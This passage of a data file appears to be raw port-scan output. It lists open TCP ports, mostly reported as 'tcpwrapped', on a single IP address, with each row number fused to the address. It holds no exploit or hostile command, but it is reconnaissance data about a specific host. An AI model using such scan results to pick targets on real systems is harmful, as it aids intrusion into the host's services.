6997149.126.72.220 3005 tcp tcpwrapped open
6998149.126.72.220 3006 tcp tcpwrapped open
6999149.126.72.220 3007 tcp tcpwrapped open
7000149.126.72.220 3008 tcp tcpwrapped open
7001149.126.72.220 3009 tcp tcpwrapped open
7002149.126.72.220 3010 tcp tcpwrapped open
7003149.126.72.220 3011 tcp tcpwrapped open
7004149.126.72.220 3012 tcp tcpwrapped open
7005149.126.72.220 3013 tcp tcpwrapped open
7006149.126.72.220 3014 tcp tcpwrapped open
7007149.126.72.220 3015 tcp tcpwrapped open
7008149.126.72.220 3016 tcp tcpwrapped open
7009149.126.72.220 3017 tcp tcpwrapped open
7010149.126.72.220 3018 tcp tcpwrapped open
7011149.126.72.220 3019 tcp tcpwrapped open
7012149.126.72.220 3020 tcp tcpwrapped open
7013149.126.72.220 3021 tcp tcpwrapped open
7014149.126.72.220 3022 tcp tcpwrapped open
7015149.126.72.220 3030 tcp tcpwrapped open
7016149.126.72.220 3047 tcp tcpwrapped open
7017149.126.72.220 3048 tcp tcpwrapped open
7018149.126.72.220 3049 tcp tcpwrapped open
7019149.126.72.220 3050 tcp tcpwrapped open
7020149.126.72.220 3051 tcp tcpwrapped open
7021149.126.72.220 3052 tcp tcpwrapped open
7022149.126.72.220 3053 tcp tcpwrapped open
7023149.126.72.220 3054 tcp tcpwrapped open
7024149.126.72.220 3055 tcp tcpwrapped open
7025149.126.72.220 3056 tcp tcpwrapped open
7026149.126.72.220 3057 tcp tcpwrapped open
7027149.126.72.220 3058 tcp tcpwrapped open
7028149.126.72.220 3059 tcp tcpwrapped open
7029149.126.72.220 3060 tcp tcpwrapped open
7030149.126.72.220 3061 tcp tcpwrapped open
7031149.126.72.220 3062 tcp tcpwrapped open
7032149.126.72.220 3063 tcp tcpwrapped open
7033149.126.72.220 3064 tcp tcpwrapped open
7034149.126.72.220 3065 tcp tcpwrapped open
7035149.126.72.220 3066 tcp tcpwrapped open
7036149.126.72.220 3067 tcp tcpwrapped open
7037149.126.72.220 3068 tcp tcpwrapped open
7038149.126.72.220 3069 tcp tcpwrapped open
7039149.126.72.220 3070 tcp tcpwrapped open
7040149.126.72.220 3071 tcp tcpwrapped open
7041149.126.72.220 3072 tcp tcpwrapped open
7042149.126.72.220 3073 tcp tcpwrapped open
7043149.126.72.220 3074 tcp tcpwrapped open
7044149.126.72.220 3075 tcp tcpwrapped open
7045149.126.72.220 3076 tcp tcpwrapped open
7046149.126.72.220 3077 tcp tcpwrapped open
7047149.126.72.220 3078 tcp tcpwrapped open
7048149.126.72.220 3079 tcp tcpwrapped open
7049149.126.72.220 3080 tcp tcpwrapped open
7050149.126.72.220 3081 tcp tcpwrapped open
7051149.126.72.220 3082 tcp tcpwrapped open
7052149.126.72.220 3083 tcp tcpwrapped open
7053149.126.72.220 3084 tcp tcpwrapped open
7054149.126.72.220 3085 tcp tcpwrapped open
7055149.126.72.220 3086 tcp tcpwrapped open
7056149.126.72.220 3087 tcp tcpwrapped open
7057149.126.72.220 3088 tcp tcpwrapped open
7058149.126.72.220 3089 tcp tcpwrapped open
7059149.126.72.220 3090 tcp tcpwrapped open
7060149.126.72.220 3091 tcp tcpwrapped open
7061149.126.72.220 3092 tcp tcpwrapped open
7062149.126.72.220 3093 tcp tcpwrapped open
7063149.126.72.220 3094 tcp tcpwrapped open
7064149.126.72.220 3095 tcp tcpwrapped open
7065149.126.72.220 3096 tcp tcpwrapped open
7066149.126.72.220 3097 tcp tcpwrapped open
7067149.126.72.220 3098 tcp tcpwrapped open
7068149.126.72.220 3099 tcp tcpwrapped open
7069149.126.72.220 3100 tcp tcpwrapped open
7070149.126.72.220 3101 tcp tcpwrapped open
7071149.126.72.220 3102 tcp tcpwrapped open
7072149.126.72.220 3103 tcp tcpwrapped open
7073149.126.72.220 3104 tcp tcpwrapped open
7074149.126.72.220 3105 tcp tcpwrapped open
7075149.126.72.220 3106 tcp tcpwrapped open
7076149.126.72.220 3107 tcp tcpwrapped open
7077149.126.72.220 3108 tcp tcpwrapped open
7078149.126.72.220 3109 tcp tcpwrapped open
7079149.126.72.220 3110 tcp tcpwrapped open
7080149.126.72.220 3111 tcp tcpwrapped open
7081149.126.72.220 3112 tcp tcpwrapped open
7082149.126.72.220 3113 tcp tcpwrapped open
7083149.126.72.220 3114 tcp tcpwrapped open
7084149.126.72.220 3115 tcp tcpwrapped open
7085149.126.72.220 3116 tcp tcpwrapped open
7086149.126.72.220 3117 tcp tcpwrapped open
7087149.126.72.220 3118 tcp tcpwrapped open
7088149.126.72.220 3119 tcp tcpwrapped open
7089149.126.72.220 3120 tcp tcpwrapped open
7090149.126.72.220 3121 tcp tcpwrapped open
7091149.126.72.220 3150 tcp tcpwrapped open
7092149.126.72.220 3155 tcp tcpwrapped open
7093149.126.72.220 3160 tcp tcpwrapped open
7094149.126.72.220 3165 tcp tcpwrapped open
7095149.126.72.220 3270 tcp tcpwrapped open
7096149.126.72.220 3299 tcp tcpwrapped open
7097149.126.72.220 3306 tcp tcpwrapped open
7098149.126.72.220 3333 tcp tcpwrapped open
7099149.126.72.220 3389 tcp tcpwrapped open
7100149.126.72.220 3391 tcp tcpwrapped open
7101149.126.72.220 3400 tcp tcpwrapped open
7102149.126.72.220 3401 tcp tcpwrapped open
7103149.126.72.220 3402 tcp tcpwrapped open
7104149.126.72.220 3403 tcp tcpwrapped open
7105149.126.72.220 3404 tcp tcpwrapped open
7106149.126.72.220 3405 tcp tcpwrapped open
7107149.126.72.220 3406 tcp tcpwrapped open
7108149.126.72.220 3407 tcp tcpwrapped open
7109149.126.72.220 3408 tcp tcpwrapped open
7110149.126.72.220 3409 tcp tcpwrapped open
7111149.126.72.220 3410 tcp tcpwrapped open
7112149.126.72.220 3412 tcp tcpwrapped open
7113149.126.72.220 3443 tcp tcpwrapped open
7114149.126.72.220 3500 tcp tcpwrapped open
7115149.126.72.220 3510 tcp tcpwrapped open
7116149.126.72.220 3521 tcp tcpwrapped open
7117149.126.72.220 3522 tcp tcpwrapped open
7118149.126.72.220 3523 tcp tcpwrapped open
7119149.126.72.220 3524 tcp tcpwrapped open
7120149.126.72.220 3530 tcp tcpwrapped open
7121149.126.72.220 3531 tcp tcpwrapped open
7122149.126.72.220 3540 tcp tcpwrapped open
7123149.126.72.220 3548 tcp tcpwrapped open
7124149.126.72.220 3549 tcp tcpwrapped open
7125149.126.72.220 3550 tcp tcpwrapped open
7126149.126.72.220 3551 tcp tcpwrapped open
7127149.126.72.220 3552 tcp tcpwrapped open
7128149.126.72.220 3553 tcp tcpwrapped open
7129149.126.72.220 3554 tcp tcpwrapped open
7130149.126.72.220 3555 tcp tcpwrapped open
7131149.126.72.220 3556 tcp tcpwrapped open
7132149.126.72.220 3557 tcp tcpwrapped open
7133149.126.72.220 3558 tcp tcpwrapped open
7134149.126.72.220 3559 tcp tcpwrapped open
7135149.126.72.220 3560 tcp tcpwrapped open
7136149.126.72.220 3561 tcp tcpwrapped open
7137149.126.72.220 3562 tcp tcpwrapped open
7138149.126.72.220 3563 tcp tcpwrapped open
7139149.126.72.220 3566 tcp tcpwrapped open
7140149.126.72.220 3567 tcp tcpwrapped open
7141149.126.72.220 3568 tcp tcpwrapped open
7142149.126.72.220 3569 tcp tcpwrapped open
7143149.126.72.220 3570 tcp tcpwrapped open
7144149.126.72.220 3572 tcp tcpwrapped open
7145149.126.72.220 3580 tcp tcpwrapped open
7146149.126.72.220 3590 tcp tcpwrapped open
7147149.126.72.220 3790 tcp tcpwrapped open
7148149.126.72.220 3791 tcp tcpwrapped open
7149149.126.72.220 3792 tcp tcpwrapped open
7150149.126.72.220 3793 tcp tcpwrapped open
7151149.126.72.220 3794 tcp tcpwrapped open
7152149.126.72.220 3838 tcp tcpwrapped open
7153149.126.72.220 3841 tcp tcpwrapped open
7154149.126.72.220 3842 tcp tcpwrapped open
7155149.126.72.220 3950 tcp tcpwrapped open
7156149.126.72.220 3951 tcp tcpwrapped open
7157149.126.72.220 3952 tcp tcpwrapped open
7158149.126.72.220 3953 tcp tcpwrapped open
7159149.126.72.220 3954 tcp adrep open
7160149.126.72.220 4000 tcp tcpwrapped open
7161149.126.72.220 4001 tcp newoak open
7162149.126.72.220 4002 tcp mlchat-proxy open
7163149.126.72.220 4021 tcp nexus-portal open
7164149.126.72.220 4022 tcp dnox open
7165149.126.72.220 4023 tcp esnm-zoning open
7166149.126.72.220 4043 tcp nirp open
7167149.126.72.220 4072 tcp zieto-sock open
7168149.126.72.220 4080 tcp lorica-in open
7169149.126.72.220 4085 tcp ezmessagesrv open
7170149.126.72.220 4120 tcp minirem open
7171149.126.72.220 4147 tcp vrxpservman open
7172149.126.72.220 4148 tcp hhb-handheld open
7173149.126.72.220 4150 tcp poweralert-nsa open
7174149.126.72.220 4155 tcp bzr open
7175149.126.72.220 4160 tcp jini-discovery open
7176149.126.72.220 4165 tcp altcp open
7177149.126.72.220 4172 tcp pcoip open
7178149.126.72.220 4243 tcp vrml-multi-use open
7179149.126.72.220 4244 tcp vrml-multi-use open
7180149.126.72.220 4250 tcp vrml-multi-use open
7181149.126.72.220 4300 tcp corelccam open
7182149.126.72.220 4333 tcp msql open
7183149.126.72.220 4343 tcp unicall open
7184149.126.72.220 4344 tcp vinainstall open
7185149.126.72.220 4400 tcp ds-srv open
7186149.126.72.220 4401 tcp tcpwrapped open
7187149.126.72.220 4402 tcp tcpwrapped open
7188149.126.72.220 4430 tcp tcpwrapped open
7189149.126.72.220 4431 tcp tcpwrapped open
7190149.126.72.220 4432 tcp tcpwrapped open
7191149.126.72.220 4434 tcp tcpwrapped open
7192149.126.72.220 4435 tcp tcpwrapped open
7193149.126.72.220 4436 tcp tcpwrapped open
7194149.126.72.220 4437 tcp tcpwrapped open
7195149.126.72.220 4439 tcp tcpwrapped open
7196149.126.72.220 4440 tcp tcpwrapped open
7197149.126.72.220 4443 tcp tcpwrapped open
7198149.126.72.220 4444 tcp tcpwrapped open
7199149.126.72.220 4445 tcp tcpwrapped open
7200149.126.72.220 4451 tcp tcpwrapped open
7201149.126.72.220 4455 tcp tcpwrapped open
7202149.126.72.220 4457 tcp tcpwrapped open
7203149.126.72.220 4459 tcp tcpwrapped open
7204149.126.72.220 4461 tcp tcpwrapped open
7205149.126.72.220 4463 tcp tcpwrapped open
7206149.126.72.220 4477 tcp tcpwrapped open
7207149.126.72.220 4482 tcp tcpwrapped open
7208149.126.72.220 4500 tcp tcpwrapped open
7209149.126.72.220 4502 tcp tcpwrapped open
7210149.126.72.220 4505 tcp tcpwrapped open
7211149.126.72.220 4572 tcp tcpwrapped open
7212149.126.72.220 4602 tcp tcpwrapped open
7213149.126.72.220 4620 tcp tcpwrapped open
7214149.126.72.220 4643 tcp tcpwrapped open
7215149.126.72.220 4848 tcp tcpwrapped open
7216149.126.72.220 4933 tcp tcpwrapped open
7217149.126.72.220 4993 tcp tcpwrapped open
7218149.126.72.220 5000 tcp tcpwrapped open
7219149.126.72.220 5001 tcp tcpwrapped open
7220149.126.72.220 5002 tcp tcpwrapped open
7221149.126.72.220 5003 tcp tcpwrapped open
7222149.126.72.220 5004 tcp tcpwrapped open
7223149.126.72.220 5005 tcp tcpwrapped open
7224149.126.72.220 5006 tcp tcpwrapped open
7225149.126.72.220 5007 tcp tcpwrapped open
7226149.126.72.220 5008 tcp tcpwrapped open
7227149.126.72.220 5009 tcp tcpwrapped open
7228149.126.72.220 5010 tcp tcpwrapped open
7229149.126.72.220 5011 tcp tcpwrapped open
7230149.126.72.220 5022 tcp tcpwrapped open
7231149.126.72.220 5050 tcp tcpwrapped open
7232149.126.72.220 5053 tcp tcpwrapped open
7233149.126.72.220 5060 tcp tcpwrapped open
7234149.126.72.220 5061 tcp tcpwrapped open
7235149.126.72.220 5080 tcp tcpwrapped open
7236149.126.72.220 5083 tcp tcpwrapped open
7237149.126.72.220 5089 tcp tcpwrapped open
7238149.126.72.220 5090 tcp tcpwrapped open
7239149.126.72.220 5100 tcp tcpwrapped open
7240149.126.72.220 5105 tcp tcpwrapped open
7241149.126.72.220 5119 tcp tcpwrapped open
7242149.126.72.220 5120 tcp tcpwrapped open
7243149.126.72.220 5130 tcp tcpwrapped open
7244149.126.72.220 5140 tcp tcpwrapped open
7245149.126.72.220 5150 tcp tcpwrapped open
7246149.126.72.220 5160 tcp tcpwrapped open
7247149.126.72.220 5180 tcp tcpwrapped open
7248149.126.72.220 5201 tcp tcpwrapped open
7249149.126.72.220 5222 tcp tcpwrapped open
7250149.126.72.220 5223 tcp tcpwrapped open
7251149.126.72.220 5224 tcp tcpwrapped open
7252149.126.72.220 5225 tcp tcpwrapped open
7253149.126.72.220 5226 tcp tcpwrapped open
7254149.126.72.220 5227 tcp tcpwrapped open
7255149.126.72.220 5228 tcp tcpwrapped open
7256149.126.72.220 5229 tcp tcpwrapped open
7257149.126.72.220 5230 tcp tcpwrapped open
7258149.126.72.220 5231 tcp tcpwrapped open
7259149.126.72.220 5232 tcp tcpwrapped open
7260149.126.72.220 5233 tcp tcpwrapped open
7261149.126.72.220 5234 tcp tcpwrapped open
7262149.126.72.220 5235 tcp tcpwrapped open
7263149.126.72.220 5236 tcp tcpwrapped open
7264149.126.72.220 5237 tcp tcpwrapped open
7265149.126.72.220 5238 tcp tcpwrapped open
7266149.126.72.220 5239 tcp tcpwrapped open
7267149.126.72.220 5240 tcp tcpwrapped open
7268149.126.72.220 5241 tcp tcpwrapped open
7269149.126.72.220 5242 tcp tcpwrapped open
7270149.126.72.220 5243 tcp tcpwrapped open
7271149.126.72.220 5244 tcp tcpwrapped open
7272149.126.72.220 5245 tcp tcpwrapped open
7273149.126.72.220 5246 tcp tcpwrapped open
7274149.126.72.220 5247 tcp tcpwrapped open
7275149.126.72.220 5248 tcp tcpwrapped open
7276149.126.72.220 5249 tcp tcpwrapped open
7277149.126.72.220 5250 tcp tcpwrapped open
7278149.126.72.220 5251 tcp tcpwrapped open
7279149.126.72.220 5252 tcp tcpwrapped open
7280149.126.72.220 5253 tcp tcpwrapped open
7281149.126.72.220 5254 tcp tcpwrapped open
7282149.126.72.220 5255 tcp tcpwrapped open
7283149.126.72.220 5256 tcp tcpwrapped open
7284149.126.72.220 5257 tcp tcpwrapped open
7285149.126.72.220 5258 tcp tcpwrapped open
7286149.126.72.220 5259 tcp tcpwrapped open
7287149.126.72.220 5260 tcp tcpwrapped open
7288149.126.72.220 5261 tcp tcpwrapped open
7289149.126.72.220 5262 tcp tcpwrapped open
7290149.126.72.220 5263 tcp tcpwrapped open
7291149.126.72.220 5264 tcp tcpwrapped open
7292149.126.72.220 5265 tcp tcpwrapped open
7293149.126.72.220 5266 tcp tcpwrapped open
7294149.126.72.220 5267 tcp tcpwrapped open
7295149.126.72.220 5268 tcp tcpwrapped open
7296149.126.72.220 5269 tcp tcpwrapped open
7297149.126.72.220 5270 tcp tcpwrapped open
7298149.126.72.220 5271 tcp tcpwrapped open
7299149.126.72.220 5272 tcp tcpwrapped open
7300149.126.72.220 5273 tcp tcpwrapped open
7301149.126.72.220 5274 tcp tcpwrapped open
7302149.126.72.220 5275 tcp tcpwrapped open
7303149.126.72.220 5276 tcp tcpwrapped open
7304149.126.72.220 5277 tcp tcpwrapped open
7305149.126.72.220 5278 tcp tcpwrapped open
7306149.126.72.220 5279 tcp tcpwrapped open
7307149.126.72.220 5280 tcp tcpwrapped open
7308149.126.72.220 5440 tcp tcpwrapped open
7309149.126.72.220 5443 tcp tcpwrapped open
7310149.126.72.220 5456 tcp tcpwrapped open
7311149.126.72.220 5494 tcp tcpwrapped open
7312149.126.72.220 5495 tcp tcpwrapped open
7313149.126.72.220 5500 tcp tcpwrapped open
7314149.126.72.220 5503 tcp tcpwrapped open
7315149.126.72.220 5552 tcp tcpwrapped open
7316149.126.72.220 5555 tcp tcpwrapped open
7317149.126.72.220 5556 tcp tcpwrapped open
7318149.126.72.220 5557 tcp tcpwrapped open
7319149.126.72.220 5567 tcp tcpwrapped open
7320149.126.72.220 5568 tcp tcpwrapped open
7321149.126.72.220 5569 tcp tcpwrapped open
7322149.126.72.220 5590 tcp tcpwrapped open
7323149.126.72.220 5591 tcp tcpwrapped open
7324149.126.72.220 5592 tcp tcpwrapped open
7325149.126.72.220 5593 tcp tcpwrapped open
7326149.126.72.220 5594 tcp tcpwrapped open
7327149.126.72.220 5595 tcp tcpwrapped open
7328149.126.72.220 5596 tcp tcpwrapped open
7329149.126.72.220 5597 tcp tcpwrapped open
7330149.126.72.220 5598 tcp tcpwrapped open
7331149.126.72.220 5599 tcp tcpwrapped open
7332149.126.72.220 5600 tcp tcpwrapped open
7333149.126.72.220 5601 tcp tcpwrapped open
7334149.126.72.220 5602 tcp tcpwrapped open
7335149.126.72.220 5603 tcp tcpwrapped open
7336149.126.72.220 5604 tcp tcpwrapped open
7337149.126.72.220 5605 tcp tcpwrapped open
7338149.126.72.220 5606 tcp tcpwrapped open
7339149.126.72.220 5607 tcp tcpwrapped open
7340149.126.72.220 5608 tcp tcpwrapped open
7341149.126.72.220 5609 tcp tcpwrapped open
7342149.126.72.220 5613 tcp tcpwrapped open
7343149.126.72.220 5614 tcp tcpwrapped open
7344149.126.72.220 5620 tcp tcpwrapped open
7345149.126.72.220 5630 tcp tcpwrapped open
7346149.126.72.220 5640 tcp tcpwrapped open
7347149.126.72.220 5650 tcp tcpwrapped open
7348149.126.72.220 5660 tcp tcpwrapped open
7349149.126.72.220 5671 tcp tcpwrapped open
7350149.126.72.220 5672 tcp tcpwrapped open
7351149.126.72.220 5673 tcp tcpwrapped open
7352149.126.72.220 5680 tcp tcpwrapped open
7353149.126.72.220 5696 tcp tcpwrapped open
7354149.126.72.220 5698 tcp tcpwrapped open
7355149.126.72.220 5701 tcp tcpwrapped open
7356149.126.72.220 5721 tcp tcpwrapped open
7357149.126.72.220 5900 tcp tcpwrapped open
7358149.126.72.220 5901 tcp tcpwrapped open
7359149.126.72.220 5902 tcp tcpwrapped open
7360149.126.72.220 5903 tcp tcpwrapped open
7361149.126.72.220 5904 tcp tcpwrapped open
7362149.126.72.220 5905 tcp tcpwrapped open
7363149.126.72.220 5906 tcp tcpwrapped open
7364149.126.72.220 5907 tcp tcpwrapped open
7365149.126.72.220 5908 tcp tcpwrapped open
7366149.126.72.220 5909 tcp tcpwrapped open
7367149.126.72.220 5910 tcp tcpwrapped open
7368149.126.72.220 5911 tcp tcpwrapped open
7369149.126.72.220 5912 tcp tcpwrapped open
7370149.126.72.220 5913 tcp tcpwrapped open
7371149.126.72.220 5914 tcp tcpwrapped open
7372149.126.72.220 5915 tcp tcpwrapped open
7373149.126.72.220 5916 tcp tcpwrapped open
7374149.126.72.220 5917 tcp tcpwrapped open
7375149.126.72.220 5918 tcp tcpwrapped open
7376149.126.72.220 5919 tcp tcpwrapped open
7377149.126.72.220 5920 tcp tcpwrapped open
7378149.126.72.220 5984 tcp tcpwrapped open
7379149.126.72.220 5985 tcp tcpwrapped open
7380149.126.72.220 5986 tcp tcpwrapped open
7381149.126.72.220 5987 tcp tcpwrapped open
7382149.126.72.220 5988 tcp tcpwrapped open
7383149.126.72.220 5989 tcp tcpwrapped open
7384149.126.72.220 5990 tcp tcpwrapped open
7385149.126.72.220 5991 tcp tcpwrapped open
7386149.126.72.220 5992 tcp tcpwrapped open
7387149.126.72.220 5993 tcp tcpwrapped open
7388149.126.72.220 5994 tcp tcpwrapped open
7389149.126.72.220 5995 tcp tcpwrapped open
7390149.126.72.220 5996 tcp tcpwrapped open
7391149.126.72.220 5997 tcp tcpwrapped open
7392149.126.72.220 5998 tcp tcpwrapped open
7393149.126.72.220 5999 tcp tcpwrapped open
7394149.126.72.220 6000 tcp tcpwrapped open
7395149.126.72.220 6001 tcp tcpwrapped open
7396149.126.72.220 6002 tcp tcpwrapped open
7397149.126.72.220 6003 tcp tcpwrapped open
7398149.126.72.220 6004 tcp tcpwrapped open
7399149.126.72.220 6005 tcp tcpwrapped open
7400149.126.72.220 6006 tcp tcpwrapped open
7401149.126.72.220 6007 tcp tcpwrapped open
7402149.126.72.220 6008 tcp tcpwrapped open
7403149.126.72.220 6009 tcp tcpwrapped open
7404149.126.72.220 6010 tcp tcpwrapped open
7405149.126.72.220 6011 tcp tcpwrapped open
7406149.126.72.220 6021 tcp tcpwrapped open
7407149.126.72.220 6060 tcp tcpwrapped open
7408149.126.72.220 6061 tcp tcpwrapped open
7409149.126.72.220 6081 tcp tcpwrapped open
7410149.126.72.220 6100 tcp tcpwrapped open
7411149.126.72.220 6102 tcp tcpwrapped open
7412149.126.72.220 6134 tcp tcpwrapped open
7413149.126.72.220 6161 tcp tcpwrapped open
7414149.126.72.220 6331 tcp tcpwrapped open
7415149.126.72.220 6348 tcp tcpwrapped open
7416149.126.72.220 6379 tcp tcpwrapped open
7417149.126.72.220 6380 tcp tcpwrapped open
7418149.126.72.220 6433 tcp tcpwrapped open
7419149.126.72.220 6440 tcp tcpwrapped open
7420149.126.72.220 6443 tcp tcpwrapped open
7421149.126.72.220 6488 tcp tcpwrapped open
7422149.126.72.220 6500 tcp tcpwrapped open
7423149.126.72.220 6505 tcp tcpwrapped open
7424149.126.72.220 6510 tcp tcpwrapped open
7425149.126.72.220 6511 tcp tcpwrapped open
7426149.126.72.220 6512 tcp tcpwrapped open
7427149.126.72.220 6514 tcp tcpwrapped open
7428149.126.72.220 6543 tcp tcpwrapped open
7429149.126.72.220 6544 tcp tcpwrapped open
7430149.126.72.220 6560 tcp tcpwrapped open
7431149.126.72.220 6561 tcp tcpwrapped open
7432149.126.72.220 6565 tcp tcpwrapped open
7433149.126.72.220 6580 tcp tcpwrapped open
7434149.126.72.220 6581 tcp tcpwrapped open
7435149.126.72.220 6590 tcp tcpwrapped open
7436149.126.72.220 6601 tcp tcpwrapped open
7437149.126.72.220 6603 tcp tcpwrapped open
7438149.126.72.220 6605 tcp tcpwrapped open
7439149.126.72.220 6661 tcp tcpwrapped open
7440149.126.72.220 6662 tcp tcpwrapped open
7441149.126.72.220 6666 tcp tcpwrapped open
7442149.126.72.220 6686 tcp tcpwrapped open
7443149.126.72.220 6688 tcp tcpwrapped open
7444149.126.72.220 6700 tcp tcpwrapped open
7445149.126.72.220 6755 tcp tcpwrapped open
7446149.126.72.220 6775 tcp tcpwrapped open
7447149.126.72.220 6779 tcp tcpwrapped open
7448149.126.72.220 6789 tcp tcpwrapped open
7449149.126.72.220 6799 tcp tcpwrapped open
7450149.126.72.220 7000 tcp tcpwrapped open
7451149.126.72.220 7001 tcp tcpwrapped open
7452149.126.72.220 7002 tcp tcpwrapped open
7453149.126.72.220 7003 tcp tcpwrapped open
7454149.126.72.220 7004 tcp tcpwrapped open
7455149.126.72.220 7005 tcp tcpwrapped open
7456149.126.72.220 7007 tcp tcpwrapped open
7457149.126.72.220 7010 tcp tcpwrapped open
7458149.126.72.220 7011 tcp tcpwrapped open
7459149.126.72.220 7021 tcp tcpwrapped open
7460149.126.72.220 7070 tcp tcpwrapped open
7461149.126.72.220 7071 tcp tcpwrapped open
7462149.126.72.220 7079 tcp tcpwrapped open
7463149.126.72.220 7080 tcp tcpwrapped open
7464149.126.72.220 7081 tcp tcpwrapped open
7465149.126.72.220 7082 tcp tcpwrapped open
7466149.126.72.220 7083 tcp tcpwrapped open
7467149.126.72.220 7084 tcp tcpwrapped open
7468149.126.72.220 7085 tcp tcpwrapped open
7469149.126.72.220 7086 tcp tcpwrapped open
7470149.126.72.220 7087 tcp tcpwrapped open
7471149.126.72.220 7088 tcp tcpwrapped open
7472149.126.72.220 7090 tcp tcpwrapped open
7473149.126.72.220 7171 tcp tcpwrapped open
7474149.126.72.220 7172 tcp tcpwrapped open
7475149.126.72.220 7272 tcp tcpwrapped open
7476149.126.72.220 7348 tcp tcpwrapped open
7477149.126.72.220 7403 tcp tcpwrapped open
7478149.126.72.220 7433 tcp tcpwrapped open
7479149.126.72.220 7441 tcp tcpwrapped open
7480149.126.72.220 7443 tcp tcpwrapped open
7481149.126.72.220 7444 tcp tcpwrapped open
7482149.126.72.220 7445 tcp tcpwrapped open
7483149.126.72.220 7473 tcp tcpwrapped open
7484149.126.72.220 7500 tcp tcpwrapped open
7485149.126.72.220 7537 tcp tcpwrapped open
7486149.126.72.220 7687 tcp tcpwrapped open
7487149.126.72.220 7700 tcp tcpwrapped open
7488149.126.72.220 7771 tcp tcpwrapped open
7489149.126.72.220 7773 tcp tcpwrapped open
7490149.126.72.220 7774 tcp tcpwrapped open
7491149.126.72.220 7775 tcp tcpwrapped open
7492149.126.72.220 7776 tcp tcpwrapped open
7493149.126.72.220 7777 tcp tcpwrapped open
7494149.126.72.220 7778 tcp tcpwrapped open
7495149.126.72.220 7779 tcp tcpwrapped open
7496149.126.72.220 7788 tcp tcpwrapped open
7497149.126.72.220 7799 tcp tcpwrapped open
7498149.126.72.220 7998 tcp tcpwrapped open
7499149.126.72.220 7999 tcp tcpwrapped open
7500149.126.72.220 8000 tcp tcpwrapped open
7501149.126.72.220 8001 tcp tcpwrapped open
7502149.126.72.220 8002 tcp tcpwrapped open
7503149.126.72.220 8003 tcp tcpwrapped open
7504149.126.72.220 8004 tcp tcpwrapped open
7505149.126.72.220 8005 tcp tcpwrapped open
7506149.126.72.220 8006 tcp tcpwrapped open
7507149.126.72.220 8007 tcp tcpwrapped open
7508149.126.72.220 8008 tcp tcpwrapped open
7509149.126.72.220 8009 tcp tcpwrapped open
7510149.126.72.220 8010 tcp tcpwrapped open
7511149.126.72.220 8011 tcp tcpwrapped open
7512149.126.72.220 8012 tcp tcpwrapped open
7513149.126.72.220 8013 tcp tcpwrapped open
7514149.126.72.220 8014 tcp tcpwrapped open
7515149.126.72.220 8015 tcp tcpwrapped open
7516149.126.72.220 8016 tcp tcpwrapped open
7517149.126.72.220 8017 tcp tcpwrapped open
7518149.126.72.220 8018 tcp tcpwrapped open
7519149.126.72.220 8019 tcp tcpwrapped open
7520149.126.72.220 8020 tcp tcpwrapped open
7521149.126.72.220 8021 tcp tcpwrapped open
7522149.126.72.220 8022 tcp tcpwrapped open
7523149.126.72.220 8023 tcp tcpwrapped open
7524149.126.72.220 8024 tcp tcpwrapped open
7525149.126.72.220 8025 tcp tcpwrapped open
7526149.126.72.220 8026 tcp tcpwrapped open
7527149.126.72.220 8027 tcp tcpwrapped open
7528149.126.72.220 8028 tcp tcpwrapped open
7529149.126.72.220 8029 tcp tcpwrapped open
7530149.126.72.220 8030 tcp tcpwrapped open
7531149.126.72.220 8031 tcp tcpwrapped open
7532149.126.72.220 8032 tcp tcpwrapped open
7533149.126.72.220 8033 tcp tcpwrapped open
7534149.126.72.220 8034 tcp tcpwrapped open
7535149.126.72.220 8035 tcp tcpwrapped open
7536149.126.72.220 8036 tcp tcpwrapped open
7537149.126.72.220 8037 tcp tcpwrapped open
7538149.126.72.220 8038 tcp tcpwrapped open
7539149.126.72.220 8039 tcp tcpwrapped open
7540149.126.72.220 8040 tcp tcpwrapped open
7541149.126.72.220 8041 tcp tcpwrapped open
7542149.126.72.220 8042 tcp tcpwrapped open
7543149.126.72.220 8043 tcp tcpwrapped open
7544149.126.72.220 8044 tcp tcpwrapped open
7545149.126.72.220 8045 tcp tcpwrapped open
7546149.126.72.220 8046 tcp tcpwrapped open
7547149.126.72.220 8047 tcp tcpwrapped open
7548149.126.72.220 8048 tcp tcpwrapped open
7549149.126.72.220 8049 tcp tcpwrapped open
7550149.126.72.220 8050 tcp tcpwrapped open
7551149.126.72.220 8051 tcp tcpwrapped open
7552149.126.72.220 8052 tcp tcpwrapped open
7553149.126.72.220 8053 tcp tcpwrapped open
7554149.126.72.220 8054 tcp tcpwrapped open
7555149.126.72.220 8055 tcp tcpwrapped open
7556149.126.72.220 8056 tcp tcpwrapped open
7557149.126.72.220 8057 tcp tcpwrapped open
7558149.126.72.220 8058 tcp tcpwrapped open
7559149.126.72.220 8060 tcp tcpwrapped open
7560149.126.72.220 8064 tcp tcpwrapped open
7561149.126.72.220 8065 tcp tcpwrapped open
7562149.126.72.220 8069 tcp tcpwrapped open
7563149.126.72.220 8070 tcp tcpwrapped open
7564149.126.72.220 8071 tcp tcpwrapped open
7565149.126.72.220 8072 tcp tcpwrapped open
7566149.126.72.220 8074 tcp tcpwrapped open
7567149.126.72.220 8079 tcp tcpwrapped open
7568149.126.72.220 8080 tcp tcpwrapped open
7569149.126.72.220 8081 tcp tcpwrapped open
7570149.126.72.220 8082 tcp tcpwrapped open
7571149.126.72.220 8083 tcp tcpwrapped open
7572149.126.72.220 8084 tcp tcpwrapped open
7573149.126.72.220 8085 tcp tcpwrapped open
7574149.126.72.220 8086 tcp tcpwrapped open
7575149.126.72.220 8087 tcp tcpwrapped open
7576149.126.72.220 8088 tcp tcpwrapped open
7577149.126.72.220 8089 tcp tcpwrapped open
7578149.126.72.220 8090 tcp tcpwrapped open
7579149.126.72.220 8091 tcp tcpwrapped open
7580149.126.72.220 8092 tcp tcpwrapped open
7581149.126.72.220 8093 tcp tcpwrapped open
7582149.126.72.220 8094 tcp tcpwrapped open
7583149.126.72.220 8095 tcp tcpwrapped open
7584149.126.72.220 8096 tcp tcpwrapped open
7585149.126.72.220 8097 tcp tcpwrapped open
7586149.126.72.220 8098 tcp tcpwrapped open
7587149.126.72.220 8099 tcp tcpwrapped open
7588149.126.72.220 8100 tcp tcpwrapped open
7589149.126.72.220 8101 tcp tcpwrapped open
7590149.126.72.220 8102 tcp tcpwrapped open
7591149.126.72.220 8103 tcp tcpwrapped open
7592149.126.72.220 8104 tcp tcpwrapped open
7593149.126.72.220 8105 tcp tcpwrapped open
7594149.126.72.220 8106 tcp tcpwrapped open
7595149.126.72.220 8107 tcp tcpwrapped open
7596149.126.72.220 8108 tcp tcpwrapped open
7597149.126.72.220 8109 tcp tcpwrapped open
